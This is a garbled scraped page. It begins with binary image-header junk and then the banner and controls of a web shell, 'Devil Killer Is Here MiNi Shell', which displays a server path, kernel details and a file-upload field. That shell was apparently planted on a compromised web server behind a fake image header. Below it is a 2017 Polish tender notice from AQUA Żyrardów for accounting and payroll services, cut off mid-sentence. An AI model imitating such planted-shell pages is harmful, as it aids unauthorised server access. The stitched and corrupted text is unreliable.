JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170301/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170301/34671-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://aqua.bip.eur.pl/public/' target='_blank'>http://aqua.bip.eur.pl/public/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 34671 - 2017
              z dnia 2017-03-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żyrardów: Świadczenie usługi księgowej oraz kadrowo-płacowej dla AQUA ŻYRARDÓW Sp. z o.o.w Żyrardowe <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>"Aqua Żyrardów" Spółka z o.o., krajowy numer identyfikacyjny
              14066036300000, ul.
              ul. Stefana Jodłowskiego 
              ,
              96300  
              Żyrardów, woj.
              mazowieckie, państwo
              Polska, tel.
              46 854 16 46 wew. 100, e-mail
              aqua@zyrardow.pl, faks
              46 854 16 46 wew. 100.
              <br />
              Adres strony internetowej (URL): http://aqua.bip.eur.pl/public/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Podmiot prawa publicznego
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://aqua.bip.eur.pl/public/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10 c ust. 2 ustawy Prawo Zamówień Publicznych składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r.-Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015r. poz. 1830), osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />AQUA ŻYRARDÓW Sp. z o.o. ul. Stefana Jodłowskiego 25/27, 96-300 Żyrardów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usługi księgowej oraz kadrowo-płacowej dla AQUA ŻYRARDÓW Sp. z o.o.w Żyrardowe <br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest obsługa księgowa oraz kadrowo-płacowa                                     AQUA ŻYRARDÓW Sp. z o. o, będącej Spółką miejską, powołaną uchwałą Rady Miasta Żyrardowa z dnia 24 maja 2006r. Aktualnie zatrudniająca 49 osób na podstawie umów                  o pracę i 41 osób  na podstawie umowy zlecenia. 
2.	Do szczegółowych zadań Wykonawcy należeć będzie w szczególności:
1)	Prawidłowe i terminowe prowadzenia ksiąg rachunkowych w zakresie pełnej księgowości na potrzeby ewidencjonowania osiągniętych przychodów i ponoszonych kosztów związanych z prowadzoną przez Spółkę działalnością, zgodnie z zasadami wynikającymi z ustawy  z 29 września 1994 r. o rachunkowości (t. j Dz. U. z 2009r,              Nr 152, poz. 1223 ze zm.) oraz z przyjętego rachunku kosztów w oparciu                                o Zakładowy Plan Kont, przy użyciu programu komputerowego spełniającego wymogi ustawy o rachunkowości;
2)	sporządzanie rocznych sprawozdań finansowych, o których mowa w umowie Spółki oraz ustawie z dnia 29 września 1994 r. o rachunkowości i przekazywania                                 ich do właściwych urzędów;
3)	sporządzanie dla Zamawiającego zeznania rocznego dla podatku dochodowego od osób prawnych ; 
4)	prowadzenie ewidencji środków trwałych zgodnie z obowiązującą klasyfikacją środków trwałych oraz wartości niematerialnych i prawnych;
5)	nadzór nad prowadzeniem niskocennych środków trwałych;
6)	nadzór nad ewidencją ilościowo- wartościową zapasów;
7)	aktualizacja wyceny środków trwałych (jeżeli zostanie zarządzona lub zaistnieją przesłanki do jej dokonania);
8)	nadzór  nad inwentaryzacją składników majątkowych i rozliczeniem inwentaryzacji;
9)	nadzór nad obiegiem, kontrolą, archiwizowaniem i zabezpieczaniem dokumentów księgowych;
10)	nadzór nad sporządzaną dokumentacją i obrotem kasowym, kontrola dziennych obrotów kasowych;
11)	kontrola formalna i rachunkowa dokumentów księgowych dostarczanych przez Zamawiającego przed ich zaksięgowaniem w księgach i ewidencjach oraz niezwłoczne informowanie Zamawiającego o ewentualnych brakach lub wadliwości przedstawionych dokumentów;
12)	nadzór nad ustalaniem i stosowaniem właściwych stawek podatkowych,                                    w szczególności  stawek podatku od towarów i usług;
13)	odbiór dokumentów Zamawiającego przez Wykonawcę w siedzibie Zamawiającego                      z częstotliwością pozwalającą na bieżące wywiązywanie się Wykonawcy                                 z obowiązków nadzoru nad sporządzaniem i obiegiem dokumentów oraz obrotem kasowym, co najmniej 2 razy w tygodniu;
14)	księgowanie na kontach księgi głównej i prowadzenie właściwej dokumentacji pomocniczej;
15)	bieżąca kontrola rozrachunków Zamawiającego z kontrahentami oraz przesyłanie  stanów tych rozrachunków co najmniej raz w miesiącu lub w razie potrzeb zgłaszanych przez Zamawiającego, drogą e- mailową;
16)	sporządzanie bilansu zamknięcia miesiąca, kwartału, półrocza, roku oraz wymaganych przez jednostki nadzorujące, sprawozdań finansowych (m.in. kwartalne, roczne,               za całość wykonania zadania i inne według wskazań jednostek nadzorujących);                     
17)	sporządzanie comiesięcznych analiz i raportów, bilansu i rachunków zysków i strat         w podziale na poszczególne obiekty (działy) kompleksu sportowo-rekreacyjnego, zgodnie z przyjętymi w Spółce zasadami rozliczania przychodów i kosztów;
18)	sporządzanie okresowych sprawozdań statystycznych i finansowych związanych                        z wypełnianiem obowiązków sprawozdawczych wobec GUS oraz banku w którym Spółka zaciągnęła zobowiązanie, a wymagających podania danych ewidencjonowanych                           w księgach rachunkowych i w zakresie danych z nich wynikających lub wymagających podania danych ewidencjonowanych w dokumentacji płacowo-kadrowej;
19)	sporządzanie zestawień obrotów i sald (miesięczne, za pełny rok obrotowy, na koniec wykonania zadania);
20)	przechowywanie ksiąg rachunkowych i dokumentacji finansowej w siedzibie Wykonawcy lub innym miejscu, w którym Wykonawca prowadzi działalność, przez okres do 1 roku od dnia zamknięcia ksiąg za rok obrotowy;
21)	udostępnianie Zamawiającemu na jego żądanie, przechowywanych dokumentów,                           w terminie do 1 dnia roboczego;
22)	prowadzenie rozliczeń podatkowych oraz terminowe i prawidłowe sporządzanie deklaracji i informacji podatkowych w zakresie podatku dochodowego od osób prawnych, podatku od towarów i usług, podatków lokalnych oraz wpłat należnych             na PFRON;
23)	sporządzanie określonych przepisami o podatku dochodowym od osób fizycznych - deklaracji i informacji podatkowych;
24)	składanie, zatwierdzonych deklaracji i zeznań podatkowych we właściwym organie podatkowym;
25)	przekazywanie Zamawiającemu  informacji o wysokości zobowiązań podatkowych;
26)	reprezentowanie Spółki w postępowaniu kontrolnym i podatkowym przed organami podatkowymi i kontroli skarbowej;
27)	przygotowywanie materiałów niezbędnych do windykacji należności, w szczególności przygotowanie zestawień dotyczących przeterminowanych należności, wystawianie not odsetkowych i sporządzanie wezwań do zapłaty;

28)	sporządzanie i składanie deklaracji zgłoszeniowych i rozliczeniowych do Zakładu Ubezpieczeń Społecznych (dla jednostki oraz osób zatrudnionych na podstawie umów                  o pracę i umów zlecenia) oraz reprezentowanie Spółki przed organami Zakładu Ubezpieczeń Społecznych;
29)	 obsługa dotycząca pracowników w zakresie spraw kadrowo-płacowych związanych                ze stosunkiem pracy, w szczególności:
a)	prowadzenie dokumentacji wynagrodzeń;
b)	przygotowywanie list płac dla zatrudnionych u Zamawiającego pracowników;
c)	nadzór nad terminową wypłatą wynagrodzeń i innych świadczeń należnych pracownikom;
d)	naliczanie nagród jubileuszowych i innych należnych pracownikom świadczeń oraz przygotowanie list płac wypłaty świadczeń;
e)	sporządzanie zaświadczeń stwierdzających zatrudnienie pracownika i wysokość jego wynagrodzenia;
f)	przygotowywanie wniosków emerytalno  rentowych na wniosek pracownika
30)	obsługa finansowo- księgowa Zakładowego Funduszu Świadczeń Socjalnych                                i Kasy Zapomogo-Pożyczkowej;
31)	nadzór nad poprawnością zawieranych umów o pracę i umów zleceń, wystawianie rachunków do zawartych umów zleceń;
32)	obsługa w zakresie zajęć wynagrodzeń przez organy egzekucyjne;
33)	prowadzenie korespondencji związanej tematycznie z zakresem wykonywanych obowiązków;
34)	przyjęcie upoważnienia i związanej z tym odpowiedzialności za dokonywanie przelewów bankowych z konta Spółki związanych z realizacją zobowiązań podatkowych, składek ZUS i płacowych oraz rat kredytu bankowego a także z realizacją innych bieżących zobowiązań;
35)	udzielanie Zarządowi i wskazanym pracownikom Spółki wyjaśnień w zakresie interpretacji przepisów prawa podatkowego i ubezpieczeń społecznych (w zakresie wynikającym z uprawnień doradcy podatkowego albo radcy prawnego albo biegłego rewidenta);
36)	udział w spotkaniach na wniosek Zamawiającego po wcześniejszym uzgodnieniu terminu, np. w posiedzeniach Rady Nadzorczej;
37)	opracowywanie rocznego planu finansowego i zmian planu w ciągu roku obrotowego oraz sporządzanie comiesięcznych raportów z wykonania planu finansowego;
38)	opracowywanie bieżących informacji o sytuacji finansowej Zamawiającego;
39)	sporządzanie i składanie okresowych sprawozdań oraz naliczanie opłat dotyczących korzystania ze środowiska;
40)	informowanie na bieżąco Zamawiającego o wszelkich istotnych sprawach z zakresu księgowości, jak i kadr i płac mających wpływ na funkcjonowanie Spółki;
41)	dokonywanie ewentualnych kontroli w zakresie prowadzenia spraw księgowych                        i kadrowo-płacowych w Spółce i niezwłoczne przekazywanie Zamawiającemu wyników                        z przeprowadzonej kontroli;
42)	do świadczenia usługi  przy użyciu posiadanego, licencjonowanego oprogramowania kadrowo-płacowego oraz oprogramowania księgowego zapewniającego bezpieczeństwo przed nieuprawnionym dostępem do gromadzonych  i przechowywanych danych.

<br /><br /><b>II.5) Główny kod CPV: </b>79211000-6<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/04/2017
                    data zakończenia: 31/03/2020<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże,  że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą  niż  500.000,00 zł (słownie: pięćset tysięcy złotych i 00/100).<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że:
        - w zakresie doświadczenia- w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał przez okres co najmniej 6 miesięcy należycie:
       - co najmniej 1 usługę polegającą  na prowadzeniu pełnej księgowości dla co najmniej 1 spółki prawa handlowego
      -  i co najmniej 1 usługę kadrowo-płacową 
      -  lub obydwie usługi jednocześnie dla tego samego podmiotu.
        - Osób skierowanych przez Wykonawcę do realizacji zamówienia dysponuje osobami                              o odpowiednich kwalifikacjach zawodowych, doświadczeniu i wykształceniu niezbędnych do prawidłowej realizacji zamówienia, tj. co najmniej 1 osobą, która pełni funkcje funkcję Głównego Księgowego, obsługującego Spółkę prawa handlowego
         i co najmniej 1 osobą, która posiada wykształcenie wyższe i ma doświadczenie                                  w prowadzeniu kadr i płac, potwierdzone odpowiednimi dokumentami.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust.5 pk1 ustawy PZP.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz 2 usług wykonywanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny                                 o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte ich wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, zgodnie z załącznikiem Nr 6 do SIWZ.
   3) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,              w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz                              z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia                                   i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z załącznikiem Nr 5 do SIWZ.
        W przypadku osoby wykonującej obsługę kadrową i płacową Zamawiający wymaga aby taka osoba była zatrudniona na umowę o pracę przez Wykonawcę.
4) Dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą  niż  500.000,00 zł (słownie: pięćset tysięcy złotych i 00/100).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Załącznik Nr 1a do formularza ofertowego -dokument umożliwiający dokonanie oceny oferty w kryterium Wykaz usług dot. kryterium doświadczenie, opisanym                     w rozdz. XIII SIWZ;
3) Załącznik Nr 1b do formularza ofertowego- dokument umożliwiający dokonanie oceny oferty w kryterium Wykaz usług dot. kryterium doświadczenie, opisanym                           w rozdz. XIII SIWZ;
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga wniesienia wadium w wysokości 6 000 zł (słownie: sześć tysięcy złotych i 00/100).
2. Wadium musi być wniesione przed upływem terminu  składania ofert.
3.Wadium może być wniesione w  następujących formach: 
   1) w pieniądzu, przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy                             w Skierniewicach Filia w Żyrardowie, ul. Łukasińskiego 13, nr konta 35929700050457194620020001, z dopiskiem Wadium w przetarg na usługę księgową oraz  kadrowo-płacową;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo 
            kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3)    gwarancjach bankowych;
    4)    gwarancjach ubezpieczeniowych;
    5)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
      ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
